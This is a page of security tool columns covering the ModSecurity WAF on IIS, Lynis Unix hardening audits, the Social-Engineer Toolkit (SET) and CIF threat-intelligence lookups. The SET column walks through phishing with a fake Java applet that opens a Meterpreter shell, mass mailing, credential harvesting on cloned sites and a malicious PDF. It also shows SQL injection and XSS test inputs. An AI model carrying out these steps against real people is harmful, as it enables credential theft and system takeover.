Quantcast
Channel: HolisticInfoSec™
Viewing all 134 articles
Browse latest View live

toolsmith: ModSecurity for IIS

$
0
0


Part 2 of 2 - Web Application Security Flaw Discovery and Prevention

Prerequisites/dependencies
Windows OS with IIS (Win2k8 used for this article)
SQL Server Express 2004 SP4 and Management Studio Express for vulnerable web app
.NET Framework 4.0 for ModSecurity IIS

Introduction

December’s issue continues where we left off in November with part two in our series on web application security flaw discovery and prevention. In November we discussed Arachni, the high-performance, modular, open source web application security scanning framework. This month we’ll follow the logical work flow from Arachni’s distributed, high-performance scan results to how to use the findings as part of mitigation practices. One of Arachni’s related features is WAF Realtime Virtual Patching.
Trustwave Spider Lab’s Ryan Barnett has discussed the concept of dynamic application scanning testing(DAST) data that can be imported into a web application firewall (WAF) for targeted remediation. This discussion included integrating export data from Arachni into ModSecurity, the cross–platform, open source WAF for which he is the OWASP ModSecurity Core Rule Set (CRS) project leader. I reached out to Ryan for his feedback with particular attention to ModSecurity for IIS, Microsoft’s web server.
He indicated that WAF technology has gained traction as a critical component of protecting live web applications for a number of key reasons, including:
1)      Gaining insight into HTTP transactional data that is not provided by default web server logging
2)      Utilizing Virtual Patching to quickly remediate identified vulnerabilities
3)      Addressing PCI DSS Requirement 6.6
The ModSecurity project is just now a decade old (first released in November 2002), has matured significantly over the years, and is the most widely deployed WAF in existence protecting millions of websites. “Until recently, ModSecurity was only available as an Apache web server module. That changed, however, this past summer when Trustwave collaborated with the Microsoft Security Response Center (MSRC) to bring the ModSecurity WAF to the both the Internet Information Services (IIS) and nginx web server platforms.  With support for these platforms, ModSecurity now runs on approximately 85% of internet web servers.” 
Among the features that make ModSecurity so popular, there are a few key capabilities that make it extremely useful:
It has an extensive audit engine which allows the user to capture the full inbound and outbound HTTP data.  This is not only useful when reviewing attack data but is also extremely valuable for web server administrators who need to trouble-shoot errors.
·         It includes a powerful, event-driven rules language which allows the user to create very specific and accurate filters to detect web-based attacks and vulnerabilities.
·         It includes an advanced Lua API which provides the user with a full-blown scripting language to define complex logic for attack and vulnerability mitigation.
·         It also includes the capability to manipulate live transactional data.  This can be used for a variety of security purposes including setting hacker traps, implementing anti-CSRF tokens, or Cryptographic HASH tokens to prevent data manipulation.
In short, Ryan states that ModSecurity is extremely powerful and provides a very flexible web application defensive framework that allows organizations to protect their web applications and quickly respond to new threats.
I also sought details from Greg Wroblewski, Microsoft’s lead developer for ModSecurity IIS.
“As ModSecurity was originally developed as an Apache web server module, it was technically challenging to bring together two very different architectures. The team managed to accomplish that by creating a thin layer abstracting ModSecurity for Apache from the actual server API. During the development process it turned out that the new layer is flexible enough to create another ModSecurity port for the nginx web server. In the end, the security community received a new cross-platform firewall, available for the three most widely used web servers.
The current ModSecurity development process (still open, recently migrated to GitHub) preserves compatibility of features between three ported versions. For the IIS version, only features that rely on specific web server behavior show functional differences from the Apache version, while the nginx version currently lacks some of the core features (like response scanning and content injection) due to limited extensibility of the server. Most ModSecurity configuration files can be used without any modifications between Apache and IIS servers. The upcoming release of the RTM version for IIS will include a sample of ModSecurity OWASP Core Rule Set in the installer.

Installing ModSecurity for IIS

In order to test the full functionality of ModSecurity for IIS I needed to create an intentionally vulnerable web application and did so following guidelines provided by Metasploit Unleashed. The author wrote these guidelines for Windows XP SP2, I chose Windows Server 2008 just to be contrarian. I first established a Win2k8 virtual machine, enabled the IIS role, downloaded and installed SQL Server 2005 Express SP4, .NET Framework 4.0, as well as SQL Server 2005 Management Studio Express, then downloaded and the ModSecurity IIS 2.7.1 installer. We’ll configure ModSecurity IIS after building our vulnerable application. When configuring SQL Server 2005 Express ensure you enable SQL Server Authentication, and set the password to something you’ll use in the connection string established in Web.config. I used p@ssw0rd1 to meet required complexity. JNote: It’s “easier” to build a vulnerable application using SQL Server 2005 Express rather than 2008 or later; for time’s sake and reduced troubleshooting just work with 2005. We’re in test mode here, not production. That said, remember, you’re building this application to be vulnerable by design. Conduct this activity only in a virtual environment and do not expose it to the Internet. Follow the Metasploit guidelines carefully but remember to establish a proper connection string in the Web.config (line 4) and build it from this sample I’m hosting for you rather than the one included with the guidelines. As an example, I needed to establish my actual server name rather than localhost, I defined my database name as crapapp instead of WebApp per the guidelines, and used p@ssw0rd1 instead of password1 as described:
I also utilized configurations recommended for the pending ModSecurity IIS install so go with my version.
Once you’re finished with your vulnerable application build you should browse to http://localhost and first pass credentials that you know will fail to ensure database connectivity. Then test one of the credential pairs established in the users table, admin/s3cr3tas an example. If all has gone according to plan you should be treated to a successful login message as seen in Figure 1.

FIGURE 1: A successful login to CrapApp
ModSecurity IIS installation details are available via TechNet but I’ll walk you through a bit of it to help overcome some of the tuning issues I ran into. Make sure you have the full version of .NET 4.0 installed and patch it in full before you execute the ModSecurity IIS installer you downloaded earlier.
Download the ModSecurity OWASP Core Rule Set (CRS) and as a starting point copy the files from the base_rules to the crs directory you create in C:\inetpub\wwwroot. Also put the test.conffile I’m also hosting for you in C:\inetpub\wwwroot. This will call the just-mentioned ModSecurity OWASP Core Rule Set (CRS) that Ryan maintains and also allow you to drop any custom rules you may wish to create right in test.conf.
There are a few elements to be comfortable with here. Watch the Windows Application logs via Event Viewer to both debug any errors you receive as well as ModSecurity alerts once properly configured. I’m hopeful that the debugging time I spent will help save you a few hours, but watch those logs regardless. Also make regular use of the Internet Information Services (IIS) Manger to refresh the DefaultAppPool under Application Pools as well as restart the IIS instance after you make config changes. Finally, this experimental installation intended to help get you started is running in active mode versus passive. It will both detect and block what the CRS notes as malicious. As such, you’ll want to initially comment out all the HTTP Policy rules in order to play with the CrapApp we built above. To do so, open modsecurity_crs_30_http_policy.conf in the crs directory and comment out all lines that start with SecRule. Again, we’re in experiment mode here. Don’t deploy ModSecurity in production with the SecDefaultActiondirective set to "block" without a great deal of testing in passive mode first or you’ll likely blackhole known good traffic.

Using ModSecurity and virtual patching to protect applications

Now that we’re fully configured, I’ll show you the results of three basic detections then close with a bit of virtual patching for your automated web application protection pleasure. Figure 2 is a mashup of a login in attempt via our CrapApp with a path traversal attack and the resulting detection and block as noted in the Windows Application log.

FIGURE 2: Path traversal attack against CrapApp denied
Similarly, a simple SQL injection such as ‘1=1-- against the same form field results in the following Application log entry snippet:
[msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:txtLogin: '1=1--"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"]

Note the various tags including a match to the appropriate OWASP Top 10 entry as a well as the relevant section of the PCI DSS.
Ditto if we pop in a script tag via the txtLogin parameter:
[data "Matched Data: "] [ver "OWASP_CRS/2.2.6"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"]
    
Finally, we’re ready to connect our Arachni activities in Part 1 of this campaign to our efforts with ModSecurity IIS. There are a couple of ways to look at virtual patching as amply described by Ryan. His latest focus has been more on dynamic application scanning testing as actually triggered via ModSecurity. There is now Lua scripting that integrates ModSecurity and Arachni over RPC where a specific signature hit from ModSecurity will contact the Arachni service and kick off a targeted scan. At last check this code was still experimental and likely to be challenging with the IIS version of ModSecurity. That said we can direct our focus in the opposite direction to utilize Ryan’s automated virtual patching script, arachni2modsec.pl, where we gather Arachi scan results and automatically convert the XML export into rules for ModSecurity. These custom rules will then protect the vulnerabilities discovered by Arachni while you haggle with the developers over how long it’s going to take them to actually fix the code.
To test this functionality I scanned the CrapApp from Arachni instance on the Ubuntu VM I built for last month’s article. I also set the SecDefaultActiondirective set to "pass" in my test.conffile to ensure the scanner is not blocked while it discovers vulnerabilities. Currently the arachni2modsec.pl script writes rules specifically for SQL Injection, Cross-site Scripting, Remote File Inclusion, Local File Inclusion, and HTTP Response Splitting. The process is simple; assuming the results file is results.xml, arachni2modsec.pl –f results.xml will create modsecurity_crs_48_virtual_patches.conf. On my ModSecurity IIS VM I’d then copy modsecurity_crs_48_virtual_patches.conf into the C:\inetpub\wwwroot\crs directory and refresh the DefaultAppPool. Figure 3 gives you an idea of the resulting rule.  

FIGURE 3: arachni2modsec script creates rule for ModSecurity IIS
Note how the rule closely resembles the alert spawned when I passed the simple SQL injection attack to CrapApp earlier in the article. Great stuff, right?

In Conclusion

What a great way to wrap up 2012 with the conclusion of this two-part series on Web Application Security Flaw Discovery and Prevention. I’m thrilled with the performance of ModSecurity for IIS and really applaud Ryan and Greg for their efforts. There are a number of instances where I intend to utilize the ModSecurity port for IIS and will share feedback as I gather data. Please let me know how it’s working for you as well should you choose to experiment and/or deploy.
Good luck and Merry Christmas.
Stay tuned to vote for the 2012 Toolsmith Tool of the year starting December 15th.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Ryan Barnett, Trustwave Spider Labs, Security Researcher Lead
Greg Wroblewski, Microsoft, Senior Security Developer


toolsmith: Hey Lynis, Audit This

$
0
0



Prerequisites/dependencies
Unix/Linux operating systems

Introduction
Happy holidays to all readers, the ISSA community, and infosec tool users everywhere. As part of December’s editorial theme for the ISSA Journal, Disaster Recovery/Disaster Planning, I thought I’d try to connect tooling and tactics to said theme. I’m going to try and do this more often so you don’t end up with a web application hacking tool as part of the forensics and analysis issue. I can hear Tom (editor) and Joel (editorial advisory board chair) now: “Congratulations Russ, it only took you seven years to catch up with everyone else, you stubborn git.” :-)
Better late than never I always say, so back to it. As cited in many resources, including Georgetown University’s System and Operations Continuity page, “Of companies that had a major loss of business data, 43% never reopen, 51% close within two years, and only 6% will survive long-term.” Clearly then, a sound disaster recovery and planning practice is essential to survival. The three control measures for effective disaster recovery planning are preventive, detective, and corrective. This month we’ll discuss Lynis, a security and system auditing tool to harden Unix/Linux (*nix) systems, as a means to which facilitate both preventative (intended to prevent an event from occurring) and detective (intended to detect and/or discover unwanted events) controls. How better to do so than with a comprehensive and effective tool that performs a security scan and determines the security posture of your *nix systems while providing suggestions or warning for any detected security issues? I caught wind of Lynis via toolswatch, a great security tools site that provides quick snapshots on tools useful to infosec practitioners. NJ Ouchn (@ToolsWatch), who runs toolswatch and the Blackhat Arsenal Tools event during Blackhat conferences, mentioned a new venture for the Lynis author (CISOfy) so it seemed like a great time to get the scoop directly from Rootkit.nl’s Michael Boelen, the Lynis developer and project lead.
According to Michael, there is much to be excited about as a Lynis Enterprise solution, including plugins for malware detection, forensics, and heuristics, is under development. This solution will include the existing Lynis client that we’ll cover here, a management and reporting interface as well as related plugins. Michael says they’re making great progress and each day brings them closer to an official first version. Specific to the plugins, while a work in progress, they create specialized hooks via the client. As an example, imagine heuristics scanning with correlation at the central node, to detect security intrusions. Compliance checking for the likes of Basel II, GLBA, HIPAA, PCI DSS, and SOx is another likely plugin candidate.
The short term roadmap consists of finishing the web interface, followed by the presenting and supporting documents. This will include documentation, checklists, control overviews and materials for system administrators, security professionals and auditors in particular. This will be followed by the plugins and related services. In the meantime CISOfy will heavily support the development of the existing Lynis tool, as it is the basis of the enterprise solution. Michael mentions that Lynis is already being used by thousands of people responsible for keeping their systems secure.
A key tenet for Lynis is proper information gathering and vulnerability determination/analysis in order to provide users with the best advice regarding system hardening. Lynis will ultimately provide both auditing functionality but monitoring and control mechanisms; remember the above mentioned preventative and detective controls? For monitoring, there will be a clear dashboard to review the environment for expected and unexpected changes with light touch for system administrators and integration with existing SIEM or configuration management tools. The goal is to leverage existing solutions and not reinvent the wheel.
Lynis and Lynis Enterprise will ultimately provide guidance to organizations who can then more easily comply with regulations, standards and best practices by defining security baselines and ready-to-use plans for system hardening in a more measurable and action-oriented manner.
One other significant advantage of Lynis is how lightweight it is and easy to implement. The requirements to run the tool are almost non-existent and it is, of course, open source, allowing ready inspection and assurances that it’s not overly intrusive. Michael intends to provide the supporting tools (such as the management interface) as a Software-as-as-Service (SAAS) solution, but he did indicate that, depending on customer feedback and need, CISOfy might consider appliances at a later stage.
I conducted an interesting little study of three unique security-centric Linux distributions running as VMWare virtual machines to put Lynis through its paces and compare results, namely, SIFT 2.1.4, SamuraiWTF2.1, and Kali 1.0. Each of these was assessed as pristine, new instances, as if they’d just been installed or initialized.

Setting Lynis up for use

Lynis is designed to be portable and as such is incredibly easy to install. Simply download and unpack Lynis to a directory of your choosing. You can also create custom packages if you wish; Lynis has been tested on multiple operating systems including Linux, all versions of BSD, Mac OS X, and Solaris. It's also been tested with all the package managers related to these operating systems so deployment and upgrading is fundamentally simple. To validate its portability I installed it on USB media as follows.
1)      On a Linux system downloadedlynis-1.3.5.tar.gz
2)      Copied and unpacked it to /media/LYNIS/lynis-1.3.5 (an ext2-formatted USB stick)
3)      In VMWare menu, selected VM, then Removable Devices, and checked Toshiba Data Traveler to make my USB stick available to the three virtual machines mentioned above.
You can opt to make modifications to the profile configuration (default.prf) file to disable or enable certain checks, and establish a template for operating system, system role, and/or security level. I ran my test on the three VMs with the default profile.

Using Lynis

This won’t be one of those toolsmith columns with lots of pretty pictures, we’re dealing with a command prompt and text output when using the Lynis client. Which is to say, change directories to your USB drive, suxh as cd /media/LYNIS/lynis-1.3.5 on my first test instance, followed by sh lynis –auditor HolisticInfoSec –cfrom a root prompt as seen in Figure 1.

FIGURE 1: Lynis kicking off
You can choose to use the –q switch for quiet mode which prompts only on warnings and doesn’t require you to step through each prompted phase. Once Lynis is finished you can immediately review results via /var/log/lynis-report.datand grep for suggestions and warnings. You’re ultimately aiming for a hardening index of 100. Unfortunately our first pass on the Kali system yielded only a 50. Lynis suggested installing auditd and removing unneeded compilers. Please note, I am not suggesting you actually do this with your Kali instance, fine if it’s a VM snapshot, this is just to prove my point re: Lynis findings. Doing so did however increase the hardening index to a 51. J
Lynis really showed its stuff while auditing the SANS SIFT 2.1.4 instance. The first pass gave us a hardening index of 59 and a number of easily rectified warnings. I immediately corrected the following and ran Lynis again:
  • warning[]=AUTH-9216|M|grpck binary found errors in one or more group files|
  • warning[]=FIRE-4512|L|iptables module(s) loaded, but no rules active|
  • warning[]=SSH-7412|M|Root can directly login via SSH|
  • warning[]=PHP-2372|M|PHP option expose_php is possibly turned on, which can reveal useful information for attackers.|
Running grpck told me that 'sansforensics' is a member of the 'ossec' group in /etc/group but not in /etc/gshadow. Easily fixed by adding ossec:!::sansforensics to /etc/gshadow.
I ran sudo ufw enable to fire up active iptables rules, then edited /etc/ssh/sshd_config with PermitRootLogin no to ensure no direct root login. Always do this as root will be bruteforce attacked and you can sudo as needed from a regular user account with sudoers permissions. Finally changing expose_php to Off in /etc/php5/apache2/php.inisolves the PHP finding.
Running Lynis again after just these four fixes improved the hardening index from 59 to 69. Sweet!
Last but not least, an initial Lynis run against SamuraiWTF informed us of a hardening index of 47. Uh-oh, thank goodness the suggestion list per sudo cat /var/log/lynis-report.dat | grep suggestion gave us a lot of options to make some systemic improvements as seen in Figure 2.

FIGURE 2: Lynis suggests how the Samurai might harden his foo
Updating just a few entries pushed the hardening index to 50; you can spend as much time and effort as you believe necessary to increase the system’s security posture along with the hardening index
The end of a Lynus run, if you don’t suppress verbosity with the –q switch will result in the like of Figure 3, including your score, log and report locations, and tips for test improvement.

FIGURE 3: The end of a verbose Lynis run
Great stuff and incredibly simple to utilize!

Conclusion

I’m looking forward to the Lynis Enterprise release from Michael’s CISOfy and believe it will have a lot to offer for organizations looking for a platform-based, centralized means to audit and harden their *nix systems. Again, count on reporting and plugins as well as integration with SIEM systems and configuration management tools such as CFEngine. Remember too what Lynis can do to help you improve auditability against controls for major compliance mandates.
Good luck, and wishing you all a very Happy Holidays.
Stay tuned to vote for the 2013 Toolsmith Tool of the Year starting December 15th.
Ping me via email if you have questions (russ at holisticinfosec dot org).
Cheers…until next month.

Acknowledgements

Michael Boelen, Lynis developer and project lead

toolsmith: Social-Engineer Toolkit (SET) - Pwning the Person

$
0
0




Prerequisites/dependencies
Python interpreter
Metasploit
BackTrack 5 R3 also includes SET







Introduction
My first discussion of  Dave Kennedy’s (@dave_rel1k) Social-Engineer Toolkit (SET) came during exploration of the Pwnie Express PwnPlug Elite for March 2012’s toolsmith.  It was there I talked about the Site Cloner feature found under Website Attack Vectors and Credential Harvesting Attack Methods. Unless you’ve been hiding your head in the sand (“if I can’t see the security problem, then it doesn’t exist”) you’re likely aware that targeted attacks such as spear phishing, whaling, and social engineering in general are prevalent. Additionally, penetration testing teams will inevitably fall back on this tactic if it’s left in scope for one reason: it always works. SET serves to increase awareness for all the possible social engineering vectors; trust me, it is useful for striking much fear in the hearts of executives and senior leaders at client, enterprise, and military briefings. It’s also useful for really understanding the attacker mindset. With distributions such at BackTrack including SET, fully configured and ready to go, it’s an absolute no brainer to add to your awareness briefing and/or pen-testing regimen.   
Dave is the affable and dynamic CEO of TrustedSec (@trustedsec) and, as SET’s creator, describes it in his own words:

The Social-Engineer Toolkit has been an amazing ride and the support for the community has been great. When I first started the toolkit, the main purpose was to help out on social engineering gigs but it's completely changed to an entire framework for social-engineering and the community. SET has progressed from a simple set of python commands and web servers to a full suite of attacks that can be used for a number of occasions. With the new version of SET that I'm working on, I want to continue to add customizations to the toolkit where it allows you to utilize the multi attack vector and utilize it in a staged approach that’s all customized. When I'm doing social-engineering gigs, I change my pretext (attack) on a regular basis. Currently, I custom code some of my options such as credential harvester first then followed by the Java Applet. I want to bring these functionalities to SET and continue forward with the ability to change the way the attack works based on the situation you need. I use my real life social-engineering experiences with SET to improve it, if you have any ideas always email me to add features!

Be sure to catch Dave’s presentation videos from DEFCON and DerbyCom, amongst others, on the TrustedSec SET page.

Quick installation notes

It’s easiest to run SET from BackTrack. Boot to it via USB or optical media, or run it as a virtual machine. Navigate to Applications | BackTrack | Exploitation Tools | Social Engineering Tools| Social Engineering Toolkit | set and you’re off to the races.
Alternatively, on any system where you have a Python interpreter and a Git (version control/source code management) client, you can have SET up and running in minutes. Ideally, the system you choose to run SET from should have Metasploit configured too as SET calls certain Metasploit payloads, but it’s not a hard, fast dependency. If no Metasploit, many SET features won’t work, simple. But if you plan to go full goose bozo…you catch my drift.
I installed set on Ubuntu 12.10 as well as Windows 7 64-bit as simply as running git clone https://github.com/trustedsec/social-engineer-toolkit/ set/ from a Bash shell (Ubuntu) or Git Shell (Windows). Note:if you’re running anti-malware on a Windows system where SET is to be installed, be sure to build an exclusion for the SET path or AV will eat some key exploits (six to be exact). A total bonus for you and I occurred as I wrote this. On 24 JAN, Dave released version 4.4.1 of SET, codename “The Goat.” If you read the CHANGES file in SET’s readme directory you’ll learn that this release includes some significant Java Applet updates, encoding and encryption functionality enhancements, and improvements for multi_pyinjector. I updated my BackTrack 5 R3 instance to SET 4.4.1 by changing directory to /pentest/exploits, issuing mv set set_back, then the above mentioned git command. Almost instantly, a shiny new SET ready for a few laps around the track.  Your SET instance needs to be available via the Internet for remote targets to phone home to, or exposed to your local network for enterprise customers. You’ll be presenting a variety of offerings to your intended victims via the SET server IP or domain name.

SET unleashed

Now to rapid fire some wonderful social engineering opportunities at you. How often do you or someone you know wander up to a sign or stop at a web page with a QR code and just automatically scan it with your smart phone? What if I want to send you to any site of my choosing? I’ll simply generate a QR code with the URL destination I want to direct you to. If I’m a really bad human being that site might be offering up the Blackhole exploit kit or something similar. Alternatively, as SET recommends when you choose this module, “when you have the QRCode generated, select an additional attack vector within SET and deploy the QRCode to your victim. For example, generate a QRCode of the SET Java Applet and send the QRCode via a mailer.”
From the SET menu, choose 1) Social-Engineering Attacks, then 9) QRCode Generator Attack Vector, and enter your desired destination URL. SET will generate the QR code and write it to /pentest/exploits/set/reports-qr_attack.pngas seen in Figure 1.

Figure 1: QR Code attack generated by SET
From SET’s main menu, 3)Third Party Modules will offer you the RATTE Java Applet Attack (Remote Administration Tool Tommy Edition), and 2) Website Attack Vectors | 1) Java Applet Attack Method will provide templates or site cloning with which you can delivery one heck of a punch via the QR code vector.

Our good friend Java is rife for social engineer targeting opportunities and SET offers mayhem aplenty to capitalize on this fact.  Here’s a sequence to follow from the SET menu:
1) Social-Engineering Attacks | 2) Website Attack Vectors | 1) Java Applet Attack Method | 1) Web Templates

Answer yes or no to NAT/Port Forwarding, enter your SET server IP or hostname, and select 1 for the Java Required template as seen in Figure 2.

Figure 2: Java applet prepped for deployment
You’ll then need to choose what payload you wish to generate. Methinks ye olde Windows Reverse_TCP Meterpreter Shell (#2 on the list) is always a safe bet. Select it accordingly. From the list of encodings, #16 on the list (Backdoored Executable) is described as the best bet. Make it so. Accept 443 as the default listener port and wait while SET generates injection code as seen in Figure 3.

Figure 3: SET-generated injection code
The Metasploit framework will then launch (wake up, Neo...the matrix has you…follow the white rabbit) and the handlers will standby for your victim to come their way.
Now, as the crafty social engineer that you are, you devise an email campaign to remind users of the “required Java update.” By the way, this campaign can be undertake directly from SET as well via 1) Social-Engineering Attacks | 5) Mass Mailer Attack. When one or more of your victims receives the email and clicks the embedded link they’ll be sent to your SET server where much joy awaits them as seen in Figure 4.

Figure 4: Victim presented with Java required and “trusted” applet
When the victim selects Run, and trust me they will, the SET terminal on the SET server will advise you that a Meterpreter session has been opened with the victim as seen in Figure 5.

Figure 5: Anyone want a shell?
For our last little bit of fun, let’s investigate 3) Infectious Media Generator under 1) Social-Engineering Attacks. If you select File-Format Exploits, after setting up your listener, you’ll be presented with a smorgasbord of payload. I selected 16) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow as I had on old VM with an old Foxit version on it. Sweet! When I opened the fileformat exploit PDF created by SET with the Foxit 4.1.1, well…you know what happened next.
As discussed in the PwnPlug article, don’t forget the Credential Harvester Attack Methods under Website Attack Vectors. This is quite literally my favorite delivery vehicle as it is utterly bomb proof. Nothing like using the templates for your favorite social media sites (you know who you are) and watching as credentials roll in.

In Conclusion

Evil-me really loves SET; it’s more fun than a clown on fire. Remember, as always with tools of this ilk, you’re the good guy in this screenplay. Use SET to increase awareness, put the fear of God in your management, motivate your clients, and school the occasional developer. Anything else is flat out illegal. J As Dave mentioned, if you have ideas for new features or enhancements for SET, he really appreciates feedback from the community.

Ping me via email if you have questions or suggestions for topic via russ at holisticinfosec dot org or hit me on Twitter via @holisticinfosec.
Cheers…until next month.

Acknowledgements

Dave Kennedy, Founder, TrustedSec, SET project lead

2012 Toolsmith Tool of the Year: ModSecurity for IIS

$
0
0
Congratulations to Ryan Barnett of Trustwave and Greg Wroblewski of Microsoft.
ModSecurity for IIS is the 2012 Toolsmith Tool of the Year.
ModSecurity for IIS finished with 35.4% of the vote, while the Pwnie ExpressPwn Plug came in second with 22.8%, and the Arachni Web Application Security Scanner came in third with 18.1% of the votes.

As ModSecurity is best utilized with the OWASP ModSecurity Core Rule Set (CRS), I will make a $50 donation to the CRS Project. I strongly advocate for your supporting this project as well; any amount will help.

Congratulations and thank you to all of this year's participants; we'll have another great round in 2013.






toolsmith: Collective Intelligence Framework

$
0
0





Prerequisites
Linux for server, stable on Debian Lenny and Squeeze, and Ubuntu v10
Perl for client (stable), Python client currently unstable

Introduction

As is often the case when plumbing the depths of my feed reader or the Dragon News Bytes mailing list I found toolsmith gold. Kyle Maxwell’s Introduction to the Collective IntelligenceFramework(CIF) lit up on my radar screen. CIF parses data from sources such as ZeuS and SpyEye Tracker, Malware Domains, Spamhaus, Shadowserver, Dragon Research Group, and others. The disparate data is then normalized into repository that allows chronological threat intelligence gathering.   Kyle’s article is an excellent starting point that you should definitely read, but I wanted to hear more from Wes Young, the CIF developer, who kindly filled me in with some background and a look forward. Wes is a Principal Security Engineer for REN-ISAC whose mission is to aid and promote cyber security operational protection and response within the higher education and research (R&E) communities. As such the tenor of his feedback makes all the more sense.
The CIF project has been an interesting experiment for us. When we first decided to transition the core components from incubation in a private trust-based community, to a more traditional open-source community model, it was merely to better support our existing community. We figured, if things were open-source, our community would have an easier time replicating our tools and processes to fit their own needs internally. If others outside the educational space benefited from that (private sector, government sector, etc), then that'd be the icing on the cake.
Years later, we discovered that ratio has nearly inverted itself. Now the CIF community has become lopsided, with the majority of users being from the international public and private spaces. Furthermore, the contribution in terms of testing, bug-fixes, documentation contributions and [more importantly] the word-of-mouth endorsements has driven CIF to become its own living organism. The demonstrated value it has created for threat analysts, who have traditionally had to beg-borrow-and-steal their own intelligence, has become immeasurable in relation to the minor investment of adoption.
As this project's momentum has given it a life all its own, future roadmapswill build off its current success. The ultimate goal of the CIF project is to create a uniform presence of your intelligence, somewhere you control. It'll read your blogs, your sandboxes, and yes, even your email (if you allow it), correlating and digging out threat information that's been traditionally locked in plain, wiki-fied or semi-formatted text. It has enabled organizations to defend their networks with up to the second intelligence from traditional data-sources as well as their peers. While traditional SEMs enable analysts to search their data, CIF enables your data to adapt your network, seamlessly and on the fly. It's your own personal Skynet. :)

Readers may enjoy Wes’ recent interview on the genesis of CIF, available as a FIRST 2012 podcast.
You may also wish to take a close look at Martin Holste’s integration of CIF with his Enterprise Log Search and Archive (ELSA) solution, a centralized syslog framework. Martin has utilized the Sphinx full-text search engine to create accelerated query functionality and a full web front end.

Installing CIF

The documentation found on the CIF wikishould be considered “must read” from top to bottom before proceeding. I won’t repeat what’s also been said (Kyle’s article has some installation pointers too), but I went through the process a couple of times to get it right so I’ll share my experience. There are a number of elements to consider if implementing CIF in a production capacity. While I installed a test instance on insignificant hardware running Debian Squeeze, if you have a 64-bit system with 8GB of RAM or more and a minimum of four cores with drive space to grow into, definitely use it for CIF. If you can also install a fresh OS, pay special attention to your disk layoutwhile configuring partition mapping during the Large Volume Manager (LVM) setup. Also follow the postgres database configuration steps closely if working from a fresh install. You’ll be changing ident sameuser to trust in pg_hba.conf for socket connections. On weak little systems such as my test server, Kyle’s suggestion to update work_mem to 512MB and checkpoint_segments to 32 in postgresql.conf is a good one. The BIND setupis quite straightforward, but again per Kyle’s feedback, make sure your forwarder IP addresses in /etc/resolv.conf match those you configure in /etc/bind/named.conf.options.
From there the install steps on the wiki can be followed verbatim. During the Load Data phase of configuration you may run into an XML parsing issue. After executing time /opt/cif/bin/cif_crontool -f -d && /opt/cif/bin/cif_crontool -d -p daily && /opt/cif/bin/cif_crontool -d -p hourly you may receive an error. The cif_crontool script is similar to cron, as I hope you’ve sagely intuited for yourself, where it calls cif_feedparser to traverse and load CIF configuration files then instructs cif_feedparser based on the configs. The error, :170937: parser error : Sequence ']]>' not allowed in content, crops up when cif_crontool attempts to parse the cleanmx feed definition in /opt/cif/etc/misc.cfg. You can resolve this by simply commenting out that definition. Wes is reaching out to clean-mx.de to get this fixed, right now there are no other options than to comment out the feed.
To install a client you need only follow the Client Setupsteps, and in your ~/.cif file apply the apikey that you created during the server install as described in CIF Config. Don’t forget to configure .cif to generate feed as also described in this section.
A final installation note: if you don’t feel like spending the time to do your own build you have the option to utilize a preconfigured Amazon EC2 instance(limited disk space, not production-ready).

Using CIF

You should set the following up, per the Server Install, as a cron job but for manual reference if you wish to update your data at random intervals, run as sudo su - cif:
1)  PATH=/bin:/usr/local/bin:/opt/cif/bin
2)      Pull feed data:
a.  cif_crontool -p daily -T low
b.  cif_crontool -p hourly -T low
3)      Crunch the data: cif_analytic -d -t 16 -m 2500 (you can up –t and –m on beefier systems but it my grind your system down)
4)      Update the feeds: cif_feeds
You can run cif from the command line; cif –h will give you all the options, cif –q where query string is an IP, URL, domain, etc. will get you started. Pay special attention to the –pparameter as it helps you define output formats such as HTML or Snort.
I immediately installed the Firefox CIF toolbar, you’ll find details on the wiki under Client | Toolbars | Firefoxas it make queries via the browser, leveraging the API a no-brainer. See WebAPI on the wiki under API. Screen shots included hereafter will be of CIF usage via this interface (easier than manually populating query URLs).
There a number of client examplesavailable on the wiki, but I’m always one to throw real-world scenarios at the tool du jour. As ZeuS developers continue to “innovate” and produce modules such as the recently discovered two-factor authentication bypass, ZeuS continues in increased usage by cybercriminals. As may likely be the common scenario, an end user on the network you try desperately to protect has called you to say that they tried to update Firefox via a link “someone sent them” but it “didn’t look right” and that they were worried “something was wrong.” You run netstat –ano on their system and see a suspicious connection, specifically 193.106.31.68. Ruh-roh, Rastro, that IP lives in the Ukraine. Go figure. What does Master Cifu say? Figure 1 fills us in.

FIGURE 1: CIF says “here be dragons”
I love mazilla-update.com, bad guy squatter genius. You need only web search ASN 49335 to learn that NCONNECT-AS Navitel Rusconnect Ltd is not a good neighborhood for your end user to be playing in. Better yet, cif –q AS49335 at the command line or drop AS49335 in the Firefox search box.
Figure 2 is a case in point, Navitel Rusconnect Ltd is definitely the wrong side of the tracks.

FIGURE 2: Can I catch a bus out of here?
 ZeuS configs and binaries, SpyEye, stolen credit card gateway, oh my.
This is a good time for a quick overview of taxonomy. Per the wiki, severity equates to seriousness, confidence denotes faith in the observation, and impact is a profile for badness (ZeuS, botnet, etc.).
Our above mentioned user does show mazilla-update.com in their browser history, let’s query it via CIF.
Figure 3 further validates suspicions.

FIGURE 3: Mazilla <> Mozilla
 You quickly discern that your end user downloaded bt.exe from mazilla-update.com. You take a quick md5sum of the binary and drop the hash in the CIF search box. 756447e177fc3cc39912797b7ecb2f92 bears instant fruit as seen in Figure 4.

FIGURE 4: CIF hash search
 Yep, looks like your end user might have gotten himself some ZeuS action.
With a resource such as CIF at your fingertips you should be able to quickly envision value added when using a DNS sinkhole (hello 127.0.0.1) or DNS-BH from malwaredomains.com where you serve up fake replies to any request for the likes of mazilla-update.com. Bonus! Beefy server for CIF: $2499. CIF licensing: $0. Bad guy fail? Priceless.

In Conclusion

